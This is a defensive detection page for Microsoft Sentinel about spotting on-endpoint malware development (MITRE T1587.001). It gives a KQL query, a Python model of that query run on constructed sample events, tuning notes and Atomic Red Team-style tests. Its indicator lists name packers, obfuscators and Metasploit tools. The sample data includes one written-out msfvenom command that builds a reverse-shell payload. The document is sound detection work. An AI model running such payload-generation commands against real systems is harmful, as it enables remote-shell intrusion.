Detect Malware in Microsoft Sentinel
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Because malware development occurs primarily on adversary-controlled infrastructure before deployment, defenders cannot directly observe this activity. Detection must pivot to identifying proxies: compilation and build tool activity on non-developer endpoints, use of known obfuscation and packing tools, characteristics of freshly compiled executables executing immediately after creation, and behavioral patterns consistent with malware testing (sandbox evasion checks, anti-analysis routines). Threat actors such as Lazarus Group, APT29, Sandworm, Kimsuky, and Indrik Spider are known to develop bespoke malware to avoid commodity detection signatures.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1587 Develop Capabilities
- Sub-technique: T1587.001 Malware
- Canonical reference: https://attack.mitre.org/techniques/T1587/001/
KQL Detection Query
let Lookback = 24h;
let ExecutionWindow = 5min;
let KnownCompilers = dynamic(["csc.exe", "vbc.exe", "msbuild.exe", "cl.exe", "link.exe", "rc.exe", "ilasm.exe"]);
// Parents under which a compiler launch is expected (IDEs, the .NET CLI, MSBuild itself)
let ExpectedCompilerParents = dynamic(["devenv.exe", "msbuild.exe", "dotnet.exe", "code.exe", "rider64.exe", "idea64.exe"]);
let KnownPackers = dynamic(["upx.exe", "upx", "themida", "enigmaprotector", "vmprotect", "pecompact", "aspack", "mpress"]);
let KnownObfuscators = dynamic(["confuserex", "obfuscar", "dotfuscator", ".netshrink", "reactornet", "codeprotector", "eazfuscator", "dnguard"]);
let MsfvenomTools = dynamic(["msfvenom", "msfconsole", "msfpayload", "metasploit"]);
let SuspiciousOutputPaths = dynamic(["\\Temp\\", "\\AppData\\Local\\Temp\\", "\\Users\\Public\\", "\\ProgramData\\"]);
// Branch 1: Compiler or build tool usage on endpoints not typical for development.
// in~ gives an exact, case-insensitive match on the image name; has_any would also match
// any file name that merely contains the term.
let CompilerActivity = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where FileName in~ (KnownCompilers)
| where InitiatingProcessFileName !in~ (ExpectedCompilerParents)
| extend DetectionBranch = "CompilerOnEndpoint"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine,
    FolderPath, SHA256, DetectionBranch;
// Branch 2: Known packer or protector tool execution (image name or command line)
let PackerActivity = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where FileName has_any (KnownPackers) or ProcessCommandLine has_any (KnownPackers)
| extend DetectionBranch = "PackerProtectorUsage"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine,
    FolderPath, SHA256, DetectionBranch;
// Branch 3: Compile-then-execute pattern: a new PE written by a compiler into a staging path,
// then executed on the same device within ExecutionWindow. The join key is device plus
// lower-cased file name; joining on DeviceName alone would pair every staged execution
// on a host with every compiled file on it.
let NewPEFiles = DeviceFileEvents
| where Timestamp > ago(Lookback)
| where ActionType == "FileCreated"
| where FileName endswith ".exe" or FileName endswith ".dll"
| where FolderPath has_any (SuspiciousOutputPaths)
| where InitiatingProcessFileName in~ (KnownCompilers)
| project DeviceName, JoinKey = tolower(FileName), CreatedAt = Timestamp,
    CreatedFolder = FolderPath, CompilerFileName = InitiatingProcessFileName;
let NewPEExecution = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where FolderPath has_any (SuspiciousOutputPaths)
| extend JoinKey = tolower(FileName);
let CompileAndExecute = NewPEFiles
| join kind=inner NewPEExecution on DeviceName, JoinKey
| where Timestamp between (CreatedAt .. (CreatedAt + ExecutionWindow))
| extend DetectionBranch = "CompileAndImmediateExecute"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine,
    FolderPath, SHA256, DetectionBranch, CompilerFileName, CreatedAt, CreatedFolder;
// Branch 4: Obfuscation tool usage
let ObfuscatorActivity = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where FileName has_any (KnownObfuscators) or ProcessCommandLine has_any (KnownObfuscators)
| extend DetectionBranch = "ObfuscatorUsage"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine,
    FolderPath, SHA256, DetectionBranch;
// Branch 5: Metasploit payload generation artifacts. Tool names are whole terms and suit
// has_any; payload names such as windows/shell_reverse_tcp are matched with a regex because
// has_any cannot match a fragment inside a term.
let PayloadGeneratorActivity = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where FileName has_any (MsfvenomTools)
    or ProcessCommandLine has_any (MsfvenomTools)
    or ProcessCommandLine matches regex @"(?i)shell_(reverse|bind)_"
| extend DetectionBranch = "PayloadGeneratorUsage"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine,
    FolderPath, SHA256, DetectionBranch;
// Union all branches
union CompilerActivity, PackerActivity, CompileAndExecute, ObfuscatorActivity, PayloadGeneratorActivity
| sort by Timestamp desc
Detects proxy indicators for on-system malware development and payload staging using the Microsoft Defender for Endpoint DeviceProcessEvents and DeviceFileEvents tables. Five detection branches: (1) compiler or build tool execution (csc.exe, vbc.exe, msbuild.exe, ilasm.exe, cl.exe, link.exe, rc.exe) launched by a parent other than an IDE, the .NET CLI or MSBuild, suggesting ad hoc compilation; (2) known packer and protector tool execution (UPX, Themida, VMProtect, PECompact); (3) compile-then-execute pattern, where a PE file created by a compiler in a staging path is executed on the same device within five minutes of its creation; (4) .NET and native obfuscation tool usage (ConfuserEx, Dotfuscator, Eazfuscator); (5) Metasploit payload generation artifacts (msfvenom and friends, or a shell_reverse/shell_bind payload name) on the command line. Branch 1 also covers Windows PowerShell 5.1 Add-Type, whose CodeDom back end spawns csc.exe as a child of powershell.exe. Because T1587.001 is a pre-compromise technique that normally runs on adversary infrastructure, this detection targets only the subset of cases where payload development, testing or staging happens on an endpoint you monitor.
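The following is an added, offline model of the query's branches in Python; it is not code from the page or from Microsoft Sentinel. It exists so the correlation logic can be exercised without a tenant: the indicator lists mirror the KQL `let` statements, Python substring matching stands in for KQL `has_any` term matching, and the branch over the msfvenom artifact list is included. All events (device names ws01, ws02, build01, lx01, account alice, file names, timestamps) are constructed sample telemetry, not real logs. The sample set deliberately contains a same-named payload.exe on a second device and a csc.exe launched by msbuild.exe on a build agent, so that the device-scoped join and the parent exclusion can be seen doing their job.

```python
from datetime import datetime, timedelta

# Indicator lists mirror the KQL `let` statements (assumed, constructed copy of the page's lists).
KNOWN_COMPILERS = {"csc.exe", "vbc.exe", "msbuild.exe", "cl.exe", "link.exe", "rc.exe", "ilasm.exe"}
EXPECTED_COMPILER_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "code.exe", "rider64.exe", "idea64.exe"}
KNOWN_PACKERS = ("upx", "themida", "enigmaprotector", "vmprotect", "pecompact", "aspack", "mpress")
KNOWN_OBFUSCATORS = ("confuserex", "obfuscar", "dotfuscator", ".netshrink", "reactornet",
                     "codeprotector", "eazfuscator", "dnguard")
MSF_ARTIFACTS = ("msfvenom", "msfconsole", "msfpayload", "metasploit", "shell_reverse", "shell_bind")
SUSPICIOUS_PATHS = ("\\temp\\", "\\users\\public\\", "\\programdata\\")
EXEC_WINDOW = timedelta(minutes=5)


def _ts(s):
    return datetime.fromisoformat(s)


def _proc(ts, device, image, cmdline, parent, folder):
    """Build one DeviceProcessEvents-shaped row (constructed sample data)."""
    return {"Timestamp": _ts(ts), "DeviceName": device, "AccountName": "alice", "FileName": image,
            "ProcessCommandLine": cmdline, "InitiatingProcessFileName": parent, "FolderPath": folder}


# Constructed sample telemetry, not real logs; column names mirror the MDE tables.
PROCESS_EVENTS = [
    _proc("2024-05-01T09:00:00", "ws01", "csc.exe",
          r"csc.exe /out:C:\Users\alice\AppData\Local\Temp\payload.exe stager.cs", "cmd.exe",
          r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"),
    _proc("2024-05-01T09:01:30", "ws01", "payload.exe", "payload.exe", "cmd.exe",
          r"C:\Users\alice\AppData\Local\Temp\payload.exe"),
    # Same file name on another device: must not pair with ws01's compile event.
    _proc("2024-05-01T09:02:00", "ws02", "payload.exe", "payload.exe", "explorer.exe",
          r"C:\Users\bob\AppData\Local\Temp\payload.exe"),
    # csc.exe spawned by MSBuild on a build agent: an ordinary build, excluded from branch 1.
    _proc("2024-05-01T10:00:00", "build01", "csc.exe", "csc.exe /noconfig @app.rsp", "msbuild.exe",
          r"C:\Program Files\dotnet\sdk\csc.exe"),
    _proc("2024-05-01T11:00:00", "ws01", "upx.exe", r"upx.exe --best C:\ProgramData\target.exe", "cmd.exe",
          r"C:\Users\alice\Downloads\upx.exe"),
    _proc("2024-05-01T12:00:00", "lx01", "bash",
          "msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o /tmp/svc", "sshd",
          "/usr/bin/bash"),
]
FILE_EVENTS = [
    {"Timestamp": _ts("2024-05-01T09:00:02"), "DeviceName": "ws01", "ActionType": "FileCreated",
     "FileName": "payload.exe", "FolderPath": r"C:\Users\alice\AppData\Local\Temp",
     "InitiatingProcessFileName": "csc.exe"},
]


def _suspicious_path(path):
    # Trailing separator so a bare folder path still matches "\temp\".
    return any(p in (path.lower() + "\\") for p in SUSPICIOUS_PATHS)


def _mentions(event, needles):
    hay = (event["FileName"] + " " + event["ProcessCommandLine"]).lower()
    return any(n in hay for n in needles)


def compiler_on_endpoint(procs):
    """Branch 1: compiler image launched by a parent that is not an IDE, dotnet or MSBuild."""
    return [e for e in procs if e["FileName"].lower() in KNOWN_COMPILERS
            and e["InitiatingProcessFileName"].lower() not in EXPECTED_COMPILER_PARENTS]


def tool_usage(procs, needles):
    """Branches 2, 4 and 5: tool or artifact name in the image name or command line."""
    return [e for e in procs if _mentions(e, needles)]


def compile_and_execute(files, procs, window=EXEC_WINDOW):
    """Branch 3: PE dropped by a compiler into a staging path, then run on the SAME device within window."""
    hits = []
    for f in files:
        if f["ActionType"] != "FileCreated" or not f["FileName"].lower().endswith((".exe", ".dll")):
            continue
        if not _suspicious_path(f["FolderPath"]) or f["InitiatingProcessFileName"].lower() not in KNOWN_COMPILERS:
            continue
        for p in procs:
            if (p["DeviceName"] == f["DeviceName"]
                    and p["FileName"].lower() == f["FileName"].lower()
                    and _suspicious_path(p["FolderPath"])
                    and f["Timestamp"] <= p["Timestamp"] <= f["Timestamp"] + window):
                hits.append(p)
    return hits


def run_detection(procs=PROCESS_EVENTS, files=FILE_EVENTS):
    """Union of all branches, newest first, as (branch, device, image) tuples."""
    rows = []
    rows += [("CompilerOnEndpoint", e) for e in compiler_on_endpoint(procs)]
    rows += [("PackerProtectorUsage", e) for e in tool_usage(procs, KNOWN_PACKERS)]
    rows += [("CompileAndImmediateExecute", e) for e in compile_and_execute(files, procs)]
    rows += [("ObfuscatorUsage", e) for e in tool_usage(procs, KNOWN_OBFUSCATORS)]
    rows += [("PayloadGeneratorUsage", e) for e in tool_usage(procs, MSF_ARTIFACTS)]
    rows.sort(key=lambda r: r[1]["Timestamp"], reverse=True)
    return [(branch, e["DeviceName"], e["FileName"]) for branch, e in rows]


if __name__ == "__main__":
    for row in run_detection():
        print(row)
```

Running it yields four rows: the msfvenom invocation on lx01, the UPX run on ws01, the ws01 payload.exe execution 88 seconds after csc.exe wrote it, and the csc.exe launch under cmd.exe. The build01 csc.exe and the ws02 payload.exe produce nothing, which is the behaviour the parent exclusion and the device-plus-filename join are meant to give; shrinking the window below 88 seconds makes the compile-and-execute hit disappear.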
Data Sources
Microsoft Defender for Endpoint advanced hunting telemetry (process creation and file creation events) ingested into Microsoft Sentinel.
Required Tables
- DeviceProcessEvents
- DeviceFileEvents
False Positives & Tuning
- Legitimate software developers running csc.exe, msbuild.exe, or vbc.exe for application development on general-purpose endpoints without a dedicated developer workstation baseline
- IT automation and configuration management tools (Ansible, Puppet, Chef) that compile scripts or produce binaries as part of deployment pipelines — especially MSBuild invocations from SCCM or build agents
- Security researchers and red team members conducting authorized testing using Metasploit, packing tools, or obfuscators on approved lab machines
- .NET applications that compile code at run time through CodeDom, such as ASP.NET dynamic compilation or Add-Type in Windows PowerShell 5.1, legitimately spawn csc.exe under w3wp.exe or powershell.exe; the .NET JIT itself never launches a compiler process
- Short command-line tokens in the packer list, such as upx, can match unrelated strings in long command lines; review matches on the command line rather than the image name before escalating
- UPX-packed legitimate software where the vendor ships pre-packed binaries and deployment scripts unpack them during installation
Testing Methodology
Validate this detection with the four test cases below, modelled on the Atomic Red Team tests for T1587.001 (linked under References). Each test lists the behaviour to exercise and the telemetry you should expect to see, stated in Sysmon and Windows Security terms; the Microsoft Defender for Endpoint equivalents consumed by the query above are DeviceProcessEvents (process create) and DeviceFileEvents (file create).
- Test 1: On-System C# Payload Compilation via csc.exe
  Expected signal: Sysmon Event ID 1 (Process Create): Image=csc.exe, CommandLine containing '/out:' and a path under %TEMP%, ParentImage=cmd.exe. Sysmon Event ID 11 (File Create): TargetFilename ending in df00tech_payload.exe in the Temp directory, initiated by csc.exe. Security Event ID 4688 (if command-line auditing is enabled) for the csc.exe invocation. Branch 1 fires on the csc.exe launch; Branch 3 fires as well if the compiled file is executed within five minutes.
- Test 2: Executable Packing with UPX
  Expected signal: Sysmon Event ID 1: Process Create for upx.exe with CommandLine containing '--best' and the target file path. Sysmon Event ID 11: File Create on df00tech_target.exe as UPX writes the packed PE back in place (Sysmon logs Event ID 11 for overwrites as well as new files). Sysmon Event ID 3: Network connection to GitHub for the UPX download, if the binary is not pre-staged. Branch 2 fires on the upx.exe process.
- Test 3: In-Memory C# Compilation via PowerShell Add-Type
  Expected signal: Sysmon Event ID 1: Process Create for powershell.exe with CommandLine containing 'Add-Type' and '-TypeDefinition' (CSharpCodeProvider is the CodeDom compiler used internally and does not appear on the command line). In Windows PowerShell 5.1 CodeDom shells out to csc.exe as a child of powershell.exe, passing a response file written to %TEMP%; that csc.exe launch is what Branch 1 catches. PowerShell 7 compiles in-process with Roslyn and produces no csc.exe process. PowerShell ScriptBlock Log Event ID 4104 captures the full Add-Type invocation, including the embedded C# source. Temporary .dll files with random names may be written to %TEMP% by the CodeDom compiler before being loaded and deleted.
- Test 4: Metasploit msfvenom Payload Generation Simulation
  Expected signal: Sysmon for Linux Event ID 1 (if deployed) or auditd execve records capturing the msfvenom command invocation; the strings 'msfvenom' and 'reverse_tcp' in the command line are the primary indicators. If msfvenom is installed and runs, an ELF binary is created in /tmp, producing a file creation event. The KQL above only sees this on hosts onboarded to Defender for Endpoint for Linux, where the execution appears in DeviceProcessEvents.
References
- https://attack.mitre.org/techniques/T1587/001/
- https://attack.mitre.org/techniques/T1027/002/
- https://attack.mitre.org/techniques/T1027/004/
- https://www.mandiant.com/resources/blog/mandiant-apt1-report
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1587.001/T1587.001.md
- https://github.com/upx/upx
- https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html
- https://learn.microsoft.com/en-us/dotnet/api/microsoft.csharp.csharpcodeprovider
- https://github.com/yck1509/ConfuserEx